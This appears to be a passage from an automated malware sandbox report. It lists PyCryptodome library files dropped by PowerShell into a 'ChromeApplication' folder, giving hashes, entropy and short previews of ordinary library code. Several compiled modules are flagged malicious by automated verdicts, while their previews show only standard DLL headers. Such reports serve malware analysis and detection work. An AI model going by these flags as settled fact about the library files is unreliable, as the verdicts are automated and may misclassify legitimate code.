                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\ECC.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3368
                                                                                                                                                                                                  Entropy (8bit):4.623430359144985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PjOqA+h7+/O1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAow58Kk1VZFGK0SOrTQASxCs
                                                                                                                                                                                                  MD5:D6B0C334F2E86B944B8B5C595D46091B
                                                                                                                                                                                                  SHA1:6D774B4906613E8AEDE7889D06E5F57C3BA51DE5
                                                                                                                                                                                                  SHA-256:11E9396C412E693B5A7D2B9A455BF7596853BE94BC0FCE01F292C1732934CBA3
                                                                                                                                                                                                  SHA-512:A58B1231C7EEBBEC0AFE7192A59204912A88D5E3F51A0356811DCBC11158A11E5D4FF617B4682817D8BE56C88FDA27BBAB95850C77C876336A2DE25927F129EB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... def size_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\ElGamal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8901
                                                                                                                                                                                                  Entropy (8bit):4.841428903824507
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:cwPQHv3DZKGLo/sNke4hft2vVHZNfvXv/Ii:zPeY2v1ZNf/oi
                                                                                                                                                                                                  MD5:F85B4D32AF5D4BBD777FB171BB3B3BD2
                                                                                                                                                                                                  SHA1:EC768344A4163127698DDEA1D4D0D63E6EAF7D49
                                                                                                                                                                                                  SHA-256:54F3AB21742989AD8BC1AA56D34505F1601E1DBFAEA89A121F981784FF339DB5
                                                                                                                                                                                                  SHA-512:82D02ECDB710663402330D41E181BB36E73C095C417DE68A1B030F44DF0D90EF6134BFDB919C93F5951622CACAABF25D351811464410D9B159B5E075086BBE29
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# ElGamal.py : ElGamal encryption/decryption and signatures..#..# Part of the Python Cryptography Toolkit..#..# Originally written by: A.M. Kuchling..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\ElGamal.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):692
                                                                                                                                                                                                  Entropy (8bit):4.899620335781504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                                                                                  MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                                                                                  SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                                                                                  SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                                                                                  SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\RSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31755
                                                                                                                                                                                                  Entropy (8bit):4.716755149805653
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+r6qvF2WYnlLZlnIEgLH3azy+uAlsKMWsKtCVeC:+rpdzYn9Zln0OLuAlsnKtCf
                                                                                                                                                                                                  MD5:0947B4DBE43E62701069600DBDF79A8C
                                                                                                                                                                                                  SHA1:0FC15553FE43466C3E23A2524771E15F2203D317
                                                                                                                                                                                                  SHA-256:5047981C1EF9B12C37FF5E5010FC9BB200FA2C7EEC64EB002ABD452944864A0E
                                                                                                                                                                                                  SHA-512:E904116A422EC30B52DCFBDA65FB19FF73852E4CC02107D59F785C170B42E6E040846F14F2ADCCA4ED3DFA6DE3527D531342EB60DF30AA4EA5929693029A441C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\RSA.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                  Entropy (8bit):4.5725118156821445
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1REquT4+vZ7+/0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:B+h7+/05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                                                                                  MD5:0DF7584DEADC1160766A1CF2E07FA3D2
                                                                                                                                                                                                  SHA1:79484FB8B9D7CE922DEBCAF136CDE6176DF649B4
                                                                                                                                                                                                  SHA-256:5CBA0D3C44217538026D4585ACA8F592FC0B21AD618AB11D45715539A365E024
                                                                                                                                                                                                  SHA-512:DD9AF3B3D3CBD332D831206883BF3C902ADCD828108215C00FA0D898B310A92A23D581BA3A513A5EA50880022E6DACF44E0AD1AF52253EE1F094F348F7B971E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, other: obj

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3236
                                                                                                                                                                                                  Entropy (8bit):5.060017011908534
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:KIB0jcQHMsvI/S3oCFG+FA16eY6ByyvHDKZQLPmO/x/c6VevK94i:dFQHvo7LQT4P6QLeO/a6CK94i
                                                                                                                                                                                                  MD5:4A857A07C057F9867133A3BDF93BCE2F
                                                                                                                                                                                                  SHA1:C49098F9F3D62CDAF15C53AE244AFD60C25356CF
                                                                                                                                                                                                  SHA-256:EE62ED1363AE2633B7498B8AE333E525CEBA8AF94CBA9F1C6DF4939581C759D8
                                                                                                                                                                                                  SHA-512:AB6B0492D6B6C1EC1BB792611493A6E1760B7B7E0F7D1610E6578DFA511E4963DE637E52E7BD2699696845DB6BE75CC96CEC44A47ED06E167719981483B436DE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):720896
                                                                                                                                                                                                  Entropy (8bit):7.668141455946428
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uad892HoxJ8gf2266y8IXhJvCKAvqVLzcrZgYIMGv1iLD9yQvG6h2:uady2HoxJFf2p3bhcrn5Go9yQO6o
                                                                                                                                                                                                  MD5:4265AFF5E6C9B13A397DB9FB5DB7E0F8
                                                                                                                                                                                                  SHA1:E82C09FD6C0CEFD3DB6C85B675AA1DBEC3B84849
                                                                                                                                                                                                  SHA-256:54F51DBA779A9FE9C0CA18A62D2BF696A7463FB76EEB5B79AC0761BEDCFF58F5
                                                                                                                                                                                                  SHA-512:D6BD223A48664BC8B1FA3600D621515F492681FC147026B56C9B5B001F36961E84B6FAD4605A37D09DA2B1C10F37E7BE3F361EFAD53D36B07955832615D55EA4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.....Z...Z...Z..jZ...Z...[...ZF..[...Z...Z*..Z...[...Z...[...Z...[...Z7..[...Z7..[...Z7..Z...Z7..[...ZRich...Z........PE..L...:..e...........!...%............T........ ...............................@............@.........................@...d.......d.... .......................0..........................................@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22528
                                                                                                                                                                                                  Entropy (8bit):6.105707923864752
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:It9aokJdjVNiqNJ5vTVu7C6dWM9FVTCIhQ5xWEARnlYT:IZkFNiqL5T+CyWMFV9hQ50EClYT
                                                                                                                                                                                                  MD5:E36E97264A271CBB7FA58DF7E873382C
                                                                                                                                                                                                  SHA1:213CD5DAA4EF7463D436ED49D972FC176BFB8E38
                                                                                                                                                                                                  SHA-256:C58844CFA2B34C5AA197DFD8C891F1D06EA08B7B1F91D87DB5A0B93BB349A87D
                                                                                                                                                                                                  SHA-512:18E0EF6EB7AA5B856BF76339D8FD59D9CBC46AB3226AC0C9773ADB8D8210361409AF443B33BE0C9CFADC9E6FA9B6DD377690E06FC557F59CC17C347D97385A38
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i....P..i.......i......i...i...i.......i.......i.......i.......i.......i....<..i.......i..Rich.i..........PE..L...;..e...........!...%.@..........N........P............................................@.........................@U..0...pV..d....p...............................Q.............................. Q..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...T....`.......N..............@....rsrc........p.......T..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48128
                                                                                                                                                                                                  Entropy (8bit):6.2529879407981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TqWAfiKd/obDZoaZweTh3W1dzl4Ow0ffPp0TGUMIoSb4HoaEB4:TgAbDZo4hsbZnPCTMIoSb4HoaZ
                                                                                                                                                                                                  MD5:39FB9B0D6C84C01B4BF29AAB7AB897C0
                                                                                                                                                                                                  SHA1:91130A7F119D380B583D0AA5238A3142A90F1299
                                                                                                                                                                                                  SHA-256:9EC53C4D0531806B15C4AC4A4E3DF0B279DE3B85FB4F42874F855A99E5E1D72A
                                                                                                                                                                                                  SHA-512:2117B21C5AE23CABE694F0E1D18B1BD558F3C1CE69C079A85F79609D515ABE3D0BED4B4061541FBD17C9541300461FD94DB78A723D78DBD030A069E35F03DA04
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........em...>...>...>...>...>...?...>...?...>...>...>...?...>...?...>...?...>...?...>...?...>...>...>...?...>Rich...>........................PE..L...<..e...........!...%..... ......T.....................................................@.............................h...h...d...................................x...................................@...............|............................text...5........................... ..`.rdata..............................@..@.data...p...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_openssh.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5261
                                                                                                                                                                                                  Entropy (8bit):5.187172722384075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:M4DqrYJALrYJHdt3EHGuIcWIKiYHbJM/pQ4W8NtOH6mCli0yZRYAD0Ov:Jqrskrs9t3q/Ih2/yzy66NlNyQW0Ov
                                                                                                                                                                                                  MD5:1BCBC8A97A925C34AAA01860EE4D8D63
                                                                                                                                                                                                  SHA1:CCF52E350B94DA06E6D8980E31CB93300A70B1C4
                                                                                                                                                                                                  SHA-256:B92D60974EF5FF39314516C2FA7ADF20886C4201C9AEA68EC633F921D4ED4B63
                                                                                                                                                                                                  SHA-512:BF9AB4DC9294CC4E70D500E594D72923722EC9A528B59881649730B89E4B6F89CCFD3E056A4DCEE0A59B416CEC513C2F7D97C326B680149173BAE01C9DC99394
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2019, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_openssh.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                  Entropy (8bit):4.758113161274864
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                                                                                  MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                                                                                  SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                                                                                  SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                                                                                  SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_x25519.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                  Entropy (8bit):4.911844496867438
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+5qu39PERtoqPAF+7BWM8o5WJ1ks/vnpjOQhWd0xiMmGffQzQrXd:iqu39PE5guBWMNWJzhjOQUixiMVnkwN
                                                                                                                                                                                                  MD5:A2556847EDC0C83BD663BDCF0DE3CA66
                                                                                                                                                                                                  SHA1:B732652A1EFB8A3CFE3203C8ABA35CCD8DCE254A
                                                                                                                                                                                                  SHA-256:50912E465830D1DBA13CA796D1B09FC85DEC83C9EF1C2AB1948366FD95B7C0BC
                                                                                                                                                                                                  SHA-512:9F93B8C70B8D5EA9E16959F90535F92A73CC7A178BD2BD51D11EF5F59EFEDB0AD4A1A435B63AE85A7D824F661221964E2F1B69AF38F18BB7A74B4F0B3EE07A7C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................R.................................................N.......N.......N>......N......Rich....................PE..L...;..e...........!...%............N........ ...............................`............@.........................@%..P....%..P....@.......................P..@....!...............................!..@............ ..h............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Random\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1866
                                                                                                                                                                                                  Entropy (8bit):5.171387928684167
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:hIB0jcQHMsvI/S3oCFadPyopEm7XRXTR5:SFQHvohqTm7XRXF5
                                                                                                                                                                                                  MD5:F6DAA1095142342733AB132C05D1DDFE
                                                                                                                                                                                                  SHA1:1EBAFA39A224F69887333A00E0AE1BD69178315E
                                                                                                                                                                                                  SHA-256:05E8D3E5D2B18C1731189DB337B04CB83E966DC385930836FA22E9EE0F376FB9
                                                                                                                                                                                                  SHA-512:246058D7F397CDCACE81B09FDEBA5B17C240264A70375D99B4FD0FFBFFC54208D312BC38894E74B531BD3F9CB40105FA9DD834C74250B73A0C8E8DB583FB0E41
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Random/__init__.py : PyCrypto random number generation..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ==

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Random\__init__.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):386
                                                                                                                                                                                                  Entropy (8bit):4.828244249619416
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                                                                                  MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                                                                                  SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                                                                                  SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                                                                                  SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Random\random.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5372
                                                                                                                                                                                                  Entropy (8bit):4.828979692628258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:o5wfFQHvoeTcHIpVaRhNkNNrvvGDwotbxcOV+gnNflG7b0/Yt5:o5wdQHv5rjIvsotlcU+g60/S
                                                                                                                                                                                                  MD5:3BD14C0DD7FE75741EE0742BDA794418
                                                                                                                                                                                                  SHA1:31B75C61FEA51D7E69247B3D47FC37DE5247C817
                                                                                                                                                                                                  SHA-256:01ADBD3F51A22F71EDD8B3FB3F45BB849C9D9A46E00A7CFD25C28EA780512E3C
                                                                                                                                                                                                  SHA-512:4FE054877C0749994FDE32CEA437C659FD2B406E3E057A2D9C27ADCFF6E556D8FEC48615B01AAD7B6502B40E5CF7C2CA342B626DB8D07F191E2D63FBD9E15E28
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Random/random.py : Strong alternative for the standard 'random' module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# C

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Random\random.pyi

                                                                                                                                                                                                  Download File
